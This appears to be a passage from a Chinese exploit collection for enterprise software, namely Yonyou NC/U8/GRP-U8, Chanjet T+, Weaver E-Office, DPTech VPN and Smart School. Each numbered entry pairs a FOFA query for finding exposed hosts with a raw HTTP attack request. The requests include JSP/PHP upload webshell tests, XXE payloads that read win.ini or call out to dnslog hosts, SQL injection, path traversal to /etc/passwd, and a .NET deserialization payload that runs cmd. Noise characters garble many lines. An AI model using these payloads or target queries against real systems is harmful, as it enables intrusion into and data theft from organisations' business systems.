0 b- P* D9 |# X9 g0 I$ U7 Q IHost: 203.25.218.166:8888( @( O5 c# F' Q3 L- m
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
! o ]; I3 h4 \5 R8 U) T5 ~+ aAccept-Encoding: gzip, deflate# \& f! B# \. `/ |
Accept: */* v' }, e! q1 C. Y9 M
Connection: close8 R. |5 d/ v+ h3 ~" l( G& p
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA0 h; f6 y: ^0 g' w& m
Content-Length: 190
5 }6 }" z. j, j+ d* PContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df07 O) H, ]+ n' m
: ]% ?" \9 L: X# i% y s--fd28cb44e829ed1c197ec3bc71748df0$ T; \; G _9 B- P* v
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"/ p1 Q; B' }6 _8 k' y
0 s1 i, k1 e/ ` Y' w, \9 h<%out.println(1111*1111);%># U' G; U- C; ]! w( |
--fd28cb44e829ed1c197ec3bc71748df0--" D0 A2 f% \, T; [" X, R8 Z# {
; W5 s' U( I; `4 M2 a
% p1 j) ] F# U0 T# o' ?36. 用友NC-Cloud soapFormat XXE. r1 C. ^9 @2 W
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
$ v6 A0 M& L' ?( j0 I2 B$ R5 ePOST /uapws/soapFormat.ajax HTTP/1.1
2 W6 P" x+ a4 M6 rHost: 192.168.40.130:8989! u5 X+ _2 t' |. I1 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0/ W+ |( H3 U) O
Content-Length: 263
/ n' G0 [+ d$ UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 X' w, o7 t" a% Z M6 b! V' K
Accept-Encoding: gzip, deflate
7 Y9 n m' L9 H) |! rAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: X0 o, c5 ~+ G
Connection: close- Z8 Q5 p: U# j1 P" s$ Y
Content-Type: application/x-www-form-urlencoded& u* o5 ~9 X% c4 I( M
Upgrade-Insecure-Requests: 1" I6 c" s8 O* \; `% v& J7 b, D
* D7 n' Q" e" @2 T0 f0 Mmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
2 S C* v' i+ F! h! B! I: @; P4 c1 E/ p2 I; x
& x8 X: N7 p+ I1 S* Y* M37. 用友NC-Cloud IUpdateService XXE
' a: q: B7 Y; `; ZFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
5 d5 F( j. _; q2 P/ o' z0 _- F2 ]POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.10 o9 P- [! O1 e% J
Host: 192.168.40.130:89892 x) c1 n0 Q3 O! ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 \/ k; j5 }2 @: t4 D, I
Content-Length: 421
5 G C, C/ @' _! S# W5 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
/ d6 _7 @- x/ r1 r: R7 O, m4 c+ oAccept-Encoding: gzip, deflate
6 [) a! B9 w4 U/ e m u. WAccept-Language: zh-CN,zh;q=0.99 F9 Z- n# r. K. v% C3 [4 E
Connection: close+ w& \ V( h# n; E1 Z" a
Content-Type: text/xml;charset=UTF-8
, _- u$ r1 y$ @/ X* Z0 Q- x- p2 \ z' LSOAPAction: urn:getResult
$ p5 @6 g$ h( U5 `Upgrade-Insecure-Requests: 1# |' g! b2 _* G
5 z: y% N" L1 }3 Q! z5 [( |( S<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
* ]6 T( O# z7 U% f<soapenv:Header/>% ~, f% W% r. t
<soapenv:Body>
$ ~7 L, h' o% i7 v<iup:getResult>
* c- n+ c3 \' J Z<!--type: string-->
8 Y4 O4 {) ]. K4 S9 {& _7 N. M<iup:string><![CDATA[
6 h& U m; ]& R: F b: Q0 R0 p<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
, l( W) R$ L) x1 v* a! p<xxx/>]]></iup:string>
+ W. m4 D4 H7 K$ b% A4 h$ p! G</iup:getResult>
2 P* G$ X. M& L8 \</soapenv:Body>" p% v6 r8 N# q+ G* Z$ p' g
</soapenv:Envelope>5 R- L# v* B Q! E4 k, `# z; I
% X, i' y% E* `( d% i* h& Y, h& s% [; t9 ] [2 R3 }# a% }
9 @: S% u0 Y8 O' @0 j- b/ K, [38. 用友U8 Cloud smartweb2.RPC.d XXE6 Y( G! ~6 u; ?+ l+ v! }$ t
FOFA:app="用友-U8-Cloud"
; f3 y1 M$ u$ Q6 u: C( mPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1$ h% H, |" Q: A2 r+ q
Host: 192.168.40.131:8088
p4 ~/ J) y% n6 Y. u, `: PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25- t$ c* W4 [1 { |, Y% o
Content-Length: 260
; i1 g5 V- |3 q3 C/ K* yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
! N. |& c9 m' Z+ ]# zAccept-Encoding: gzip, deflate
1 d" G7 U( m4 v+ W$ w1 K6 TAccept-Language: zh-CN,zh;q=0.9- T5 i0 N9 l \. P _% K" H/ }
Connection: close
( q3 E* D& ~5 b# b6 L- L1 ]" ?7 pContent-Type: application/x-www-form-urlencoded" m, m7 y y; Z% I" [1 Y
& u( _& J3 F8 u* {4 U- [4 ?% D/ j__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>, v+ o6 C# a. o6 \+ R- E
" d. T( ~1 c. Y! |5 O, V$ h- M; f" G
39. 用友U8 Cloud RegisterServlet SQL注入5 V. w' D0 T4 @. r1 c t3 {& A
FOFA:title="u8c"1 H! y0 D5 e) @% k/ H0 N5 W
POST /servlet/RegisterServlet HTTP/1.12 @) H& c, o) [
Host: 192.168.86.128:8089/ Y( U. g: U9 U1 J6 V, o1 N/ r" U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.361 u& q8 U7 @: b& r
Connection: close
! K$ Q, n5 U& j7 }Content-Length: 852 Q5 F( b: g) M' g9 b
Accept: */*
9 A/ w' w# U, i9 N; uAccept-Language: en
: i7 [4 n& y. u0 v7 |* g8 [Content-Type: application/x-www-form-urlencoded& t- |! Z- ?8 M) U1 z( }4 i- k" O
X-Forwarded-For: 127.0.0.1. N t0 @, Z( y5 T2 d" E9 w
Accept-Encoding: gzip
8 J+ i5 X* o4 m* B. C5 t
" j3 Q% E0 K+ U' Rusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
# } p! ?, d1 |( `- B9 e( F/ ~1 q8 ~4 [( u" E" }0 ]0 ~6 O
, {2 R" C+ L4 K$ Q* L: ~( R3 L40. 用友U8-Cloud XChangeServlet XXE
' S; M% H$ W% o6 d" ^2 zFOFA:app="用友-U8-Cloud": g9 B! s" v* H* \" A A
POST /service/XChangeServlet HTTP/1.1
* }2 f' \* k0 b/ u# GHost: x.x.x.x' j! ^! l% q1 r/ @$ U! m
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 W& c$ V [. q4 o7 E+ I: o9 qContent-Type: text/xml
) Y, i- C% I6 MConnection: close
: x* ]2 J: g& B3 x3 \* R9 {4 r/ k3 Z! V& Y1 v' G4 _7 W
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
1 M- [. W: v' s5 h3 n. X- W2 z: E0 i: s
5 h2 p6 w8 X' W* | W
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
4 S0 S8 t$ r7 C0 H& [& UFOFA:app="用友-U8-Cloud"* y) p; }9 u M S
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
1 e6 f# R/ Z- p1 uHost:6 c5 D1 O" v% i3 t: R0 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 l/ |# y4 ]3 T6 D( A% G6 b1 sContent-Type: application/json
# q# H( S' R5 |8 C8 aAccept-Encoding: gzip. r; X. B6 ]* j
Connection: close- C* r' K! y# E9 Q
8 p! i* |4 n+ A8 U( Y$ S- t4 C
4 Q& w4 ?' ^2 b$ y2 C42. 用友GRP-U8 SmartUpload01 文件上传! \. a$ P0 v! C3 }2 H
FOFA:app="用友-GRP-U8"
6 z* o2 ?. J9 x" UPOST /u8qx/SmartUpload01.jsp HTTP/1.15 Z+ \* s; ~5 F: N2 i
Host: x.x.x.x
4 J/ p! I B# | q% `) z6 X/ WContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
+ i$ P; O6 h# e3 Q( Z& ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
H M f7 `; T
4 d5 c9 m9 h/ H( Y* L9 e/ a' PPAYLOAD3 S7 N% Q3 Y% ]# M
5 @0 Q: ^" q& I4 N; \+ e
& @- |( ~- u5 r, ^. E1 fhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
, Q5 J0 F- D1 U+ t/ Y% e* {+ i4 S1 l& j; V! [; j/ D8 ]
43. 用友GRP-U8 userInfoWeb SQL注入致RCE; ]5 T% Z' _9 R
FOFA:app="用友-GRP-U8"
& W9 X; W3 @* O9 w* Y1 @ L" _POST /services/userInfoWeb HTTP/1.1
2 o+ A4 f% ^7 O( G/ L K, @Host: your-ip2 j. R" y+ n' i1 G! s7 S0 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36' \. [' t5 x; t$ d$ E9 d4 j5 V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( O! ^4 M3 k8 f8 sAccept-Encoding: gzip, deflate
7 n. y4 I- T/ A! tAccept-Language: zh-CN,zh;q=0.9) ^/ X% l1 V0 e# J" V0 G
Connection: close
7 V5 n( x2 {. a+ y8 PSOAPAction:
2 `7 ~9 \: \: r6 XContent-Type: text/xml;charset=UTF-8# p6 k2 ^/ J: z2 [' T3 ]1 h
& E( U. X o1 s$ m; y
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">4 _. @! p" C" u% H( x
<soapenv:Header/>$ m4 G6 n, b3 N! n9 m8 n+ ^
<soapenv:Body>5 C0 h% g4 V$ f* x) {4 w n
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">& H% |2 Y& Z' h" h
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
5 T0 r- R! c( \ ?( f9 m </ser:getUserNameById>
4 e; _/ l, {8 g+ o6 s( |- j4 V% ? </soapenv:Body>- l$ f/ z3 D! o. p/ S( O/ _
</soapenv:Envelope>: @ O8 P8 r5 x4 p) E; o
# V+ }, e9 x7 X7 f7 z
2 Z; H8 Y* k5 `' m' ?5 F, K5 H0 m44. 用友GRP-U8 bx_dj_check.jsp SQL注入6 g# q! @1 @7 ]
FOFA:app="用友-GRP-U8"# L T; O7 Z3 B% p6 [5 r# j
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1" B( a) `( J' \3 n
Host: your-ip
# w' G# M% [: K( L; g3 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
) H5 L- ^% w: F! ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 H" y; v8 I/ dAccept-Encoding: gzip, deflate
7 G' a( e# S- @4 n, sAccept-Language: zh-CN,zh;q=0.9
! T. w( q$ B9 ]9 q# F5 sConnection: close
/ x/ L9 [) j0 ^, ~( a& c0 q6 O
8 q# ~( M. e, ^; @+ z4 c# E
9 g0 Q- G9 C: x6 G45. 用友GRP-U8 ufgovbank XXE5 m% l2 O2 u" I
FOFA:app="用友-GRP-U8"7 |$ R4 \% J' {& m& ^: q# X
POST /ufgovbank HTTP/1.1
7 {5 x) S |2 ~; F0 I2 ~Host: 192.168.40.130:222
" J1 ~3 o8 ?/ h# e2 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0. r, Q* M2 s0 O3 e- ~+ W3 m; A7 `$ P
Connection: close
0 b% n) Z% w; X/ MContent-Length: 161+ t) e5 b% T+ i; U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 ~) u; F- t$ y4 Q' z- D/ X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 [+ I- v( ?$ T% V. P1 ]# f9 c" ^/ yContent-Type: application/x-www-form-urlencoded6 n, i1 n+ w/ O6 E X& \) T
Accept-Encoding: gzip! Y$ [6 C0 Q, P
; H; x) X& R! H
reqData=<?xml version="1.0"?>: M# U4 k& Q5 {9 I# {
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
1 _; r% h% g& a% ], l0 d9 M% s; F* D9 m8 V5 d H- e
/ \6 k: O" {. [ F3 I' R6 C46. 用友GRP-U8 sqcxIndex.jsp SQL注入2 P6 D& ?: e- T
FOFA:app="用友-GRP-U8"2 T- ?: P; K" u. y' g
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1% B7 Y( z$ J3 ]9 F9 i& V# b' ^
Host: your-ip- e& U* b+ z3 g. @, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
7 M! h4 G. Z6 K) |3 }" n( vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 o$ u4 \5 E# R r
Accept-Encoding: gzip, deflate
" V3 G5 H: G) L z! HAccept-Language: zh-CN,zh;q=0.9
8 a4 ^, E# N" Q/ e6 g4 KConnection: close
( |2 W W0 J" U( `+ \9 u# X/ O$ q3 b0 H4 b2 t" I0 t' _0 \8 K0 F
# R) s ]+ y M3 B* J, |1 g
47. 用友GRP A++Cloud 政府财务云 任意文件读取
$ l* @4 C3 c& r/ R( o! TFOFA:body="/pf/portal/login/css/fonts/style.css"
* S, q# [9 c" O) p6 S+ AGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
; A4 A! u; [% P/ V# j; R7 } wHost: x.x.x.x! d1 P0 M* Q6 x2 q
Cache-Control: max-age=0' J4 L$ p5 ]" X" k6 k2 b5 x
Upgrade-Insecure-Requests: 1# s G/ @" j0 i; r0 O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.368 \; R! _; m' e3 Z0 O+ o: q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( u9 D( p3 p- O1 eAccept-Encoding: gzip, deflate, br
! ?) U7 A* L2 J; ?/ cAccept-Language: zh-CN,zh;q=0.9
5 S/ M1 Q8 `/ T, T; H: mIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
/ l; O- z* E' N! K8 u5 Q7 fConnection: close
; K) V9 _+ w) H
0 g9 J5 P0 ]* R' r# t$ E; D" p8 n1 a# P7 r& k; n# f$ o! G, E1 M5 K
3 O& w8 U y# P5 R0 ?& W! M48. 用友U8 CRM swfupload 任意文件上传
: r g8 m/ p/ ~: G. tFOFA:title="用友U8CRM"
6 O: R6 \9 r8 h8 GPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
9 x1 W6 Z6 O: L0 mHost: your-ip5 ~ {+ R' @5 a3 H; ~ [2 M1 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! e6 J( p% R; b, Q& p* uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
T, g0 a. ^' j9 |5 X) @8 I* [1 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) _6 l+ `, S. S3 j" k
Accept-Encoding: gzip, deflate
7 ^# ^$ {, [2 X& g( |( y y w- XContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
& C8 g0 O% U9 B/ Y/ z- l------269520967239406871642430066855' y# N( }1 M! M. }; ^3 d9 k2 O$ W
Content-Disposition: form-data; name="file"; filename="s.php"
$ {# I( n8 \/ y8 C3 p12318 q4 V. O' z9 m+ a& h4 u v
Content-Type: application/octet-stream
8 F1 Z& l6 I# P* B) E------269520967239406871642430066855; m" L, e) e9 h$ C+ }1 H& k
Content-Disposition: form-data; name="upload"
6 d$ X$ c' H% x/ T; Zupload
, Q0 N5 z% }' n- ]& p5 ^" a------269520967239406871642430066855--" a; L; q) J! o, Q! ] K9 c
7 K4 p8 [6 y& X1 b3 ]
& S: P6 N( r2 H w/ V- w+ K49. 用友U8 CRM系统uploadfile.php接口任意文件上传
* G, i6 U+ ~! N* D" g" UFOFA:body="用友U8CRM"
6 T- e6 w1 ^& i8 L+ G+ _# V- A- J" { G1 B& B
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
$ T9 _% L. q, tHost: x.x.x.x
% C6 P7 O. ~- V* rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, a: G/ Z. P% o) a
Content-Length: 329
7 c q% a/ a- z8 \" d7 I" q& ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( c/ b$ K" n6 }
Accept-Encoding: gzip, deflate0 H( F. A. N1 e0 ]& d' d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 w# k# r, N2 @; t" wConnection: close' E& ^. a1 g! B4 A* M: Y- _5 U
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w. I1 F% d" p# m# e, g
0 j) a: c" q7 B
-----------------------------vvv3wdayqv3yppdxvn3w
7 q* M i) r3 W( dContent-Disposition: form-data; name="file"; filename="%s.php "% ^5 C$ }% O( u6 @! ~ d* K
Content-Type: application/octet-stream
. D: v- t5 m+ U8 B. w7 M
+ I& F+ G& ]7 ?9 U6 Q: j# F% twersqqmlumloqa% l( r9 c0 l ^ W6 j! U& d1 {; b
-----------------------------vvv3wdayqv3yppdxvn3w
$ W0 v& H/ ?. p) rContent-Disposition: form-data; name="upload"
. s, L/ ~- [$ r1 v: i
0 O! @8 V6 [2 n# y' Z; {' Xupload3 {, u) u9 J: O
-----------------------------vvv3wdayqv3yppdxvn3w--
: S% b0 x+ w% T
: S( A+ Q6 I2 _* W% Q& G3 m7 o; g4 t3 j' Q
http://x.x.x.x/tmpfile/updB3CB.tmp.php) A; `& H: n6 H1 ?# F
( G4 w+ a$ @) h; ]6 r F
50. QDocs Smart School 6.4.1 filterRecords SQL注入
% d2 Z3 ?9 w) n M% b5 g9 MFOFA:body="close closebtnmodal"
# n. `$ @' A! J3 K1 VPOST /course/filterRecords/ HTTP/1.1
; g Z9 y' S7 U1 aHost: x.x.x.x; v2 x! U$ A, a9 f9 j7 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36& g- D* X7 B6 h
Connection: close
" m' l: b. n: V/ G3 Y) JContent-Length: 224# [5 P1 q& V: b% S- R9 q8 p3 B
Accept: */*7 V* [& U+ I. w
Accept-Language: en
7 Z$ ]" m4 t0 \! R; E6 CContent-Type: application/x-www-form-urlencoded8 C- H0 B% }* h x+ _2 I9 {/ L
Accept-Encoding: gzip3 B8 p7 X1 F) B" H- }7 Y, H
" S: u9 h+ j: v% H A
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=16 p) ^; G$ k9 U5 y( v" }8 v
2 R1 Z+ G; n/ }4 A
y+ |3 d7 R( y. S
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
; g' K V C. R0 oFOFA:app="云时空社会化商业ERP系统"& O' ^( b% D+ V4 J& h- @! [
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1% F7 T$ h# a' r+ g
Host: your-ip6 q; _6 `2 k4 b5 X( C
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
8 z7 |3 n: o5 F# o7 n/ O; aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9( k; A3 v$ c2 g0 i
Accept-Encoding: gzip, deflate
: O% F6 p C: a( z! Y7 j! MAccept-Language: zh-CN,zh;q=0.9
! q X/ o- |, s# U0 k' I% G( |: g, oConnection: close8 z4 M% Q7 t* Z( C9 m/ ]8 V
4 q& ~6 ]8 ~ e/ `
' o* [! U0 o6 `0 d1 I52. 泛微E-Office json_common.php sql注入- A+ G" x! ?4 H
FOFA:app="泛微-EOffice"+ q% L' P- e& _# T
POST /building/json_common.php HTTP/1.1) ~$ Y) g, p2 Q6 h& ^/ p/ F$ F
Host: 192.168.86.128:8097
0 q- H% l- w" |' b0 G. b( lUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 R. E/ d$ u8 J$ N4 k( s+ MConnection: close
, Q. H6 u- P! f$ u! T/ x' @2 uContent-Length: 87( }3 q5 a" L3 X& C* r0 z
Accept: */*& n4 x0 t4 v, b) t! A& ^2 J
Accept-Language: en
4 e5 Z9 m6 `! i- y( U& k) ]Content-Type: application/x-www-form-urlencoded$ r+ t( [: \: j, `# K# G5 S/ P
Accept-Encoding: gzip: G; Q2 R. k( V: [. F# M: L( W- v
( K; c# @3 }# u5 Q" X7 Itfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3334 s- a5 g7 y6 y$ `* Z% n
' F# G- H# f) i
3 d( H+ C. @% S; P53. 迪普 DPTech VPN Service 任意文件上传9 B6 }& h& d& x+ K( Q
FOFA:app="DPtech-SSLVPN"1 T& Y! P: C' C; j9 c1 S C
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
8 B a6 |0 M6 ~! N+ }4 v. U0 U* p! |& Q( p2 B) \, H% F
( `+ j2 }" L P/ }1 F/ B% B54. 畅捷通T+ getstorewarehousebystore 远程代码执行8 T' N7 c* c" i: h2 a( k
FOFA:app="畅捷通-TPlus"4 y W& w! T/ Y X, b1 J" f6 O
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
3 E* Z4 t" ]7 y; f- C$ J"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% P7 h7 z0 l7 T. a q8 G, H
3 d0 h) x# U! W8 Y
! F' d& S! ?( N: f完整数据包
! b4 E z- J+ i- n+ uPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.16 n" N, o. a2 R( G8 j+ c7 t
Host: x.x.x.x
2 r" O4 y$ e0 v# aUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
' s0 v: I% }/ y1 n8 \( uContent-Length: 593+ Y- j8 L6 x* M2 P) T8 g5 e
$ [- u0 n. p$ r! d E
{
4 O4 R- U$ i' s7 F"storeID":{/ N4 x8 {2 |( z( _5 }3 B% Y; f
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",; ~* Y# I1 h3 D/ n3 ]
"MethodName":"Start",
; W, o5 b$ U4 X0 B* g "ObjectInstance":{7 `. q0 D0 c, P/ d7 E9 @$ [4 K
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 l/ C) V. {3 d j. w
"StartInfo":{
2 \6 t* c5 u1 G+ C* e "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
4 c; H4 `; @ E; [( N3 R "FileName":"cmd",8 y5 O3 ]- p1 q9 n
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt", P# U) F7 c/ `
}& ~2 S7 V. f: j
}5 ~( i, O9 B" z; j6 a
}
: {. h7 p& A6 K: ~}
; W; w5 a j3 n! ~% n4 g) w
% F R7 S Y/ P4 L
3 V k: Q8 L/ }/ A第二步,访问如下url( Z$ I' |7 p8 c, U4 c9 }
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
K4 i8 E, x2 t" k/ c/ Q
' E8 ?/ O/ C t1 Z1 a+ K
$ [0 Y3 a- t; h0 w55. 畅捷通T+ getdecallusers信息泄露" P- E1 F" v8 K9 S3 w
FOFA:app="畅捷通-TPlus"! }: F4 a+ T3 s. A1 v# O+ G
第一步,通过7 J1 ?4 K# W ?: J) @
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
0 i2 b4 R+ b# i" F# Y* p第二步,利用获取到的Cookie请求, @- `, ~" H4 R
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
1 Y/ N3 M' d; g
, M% U8 c1 Q% W1 n56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE$ I3 \9 N0 z2 j
FOFA: app="畅捷通-TPlus"# V1 q& L3 \9 L! z% f, k
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
0 q1 h- I C, F# o0 CHost: x.x.x.x. X# `* f8 ?5 J0 _" w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36* `+ t& v& U) |, p! i
Content-Type: application/json4 s$ L' |- w1 U: X$ b* l0 c' O
5 A8 G# F2 _) N8 K/ K+ s1 F' Q{
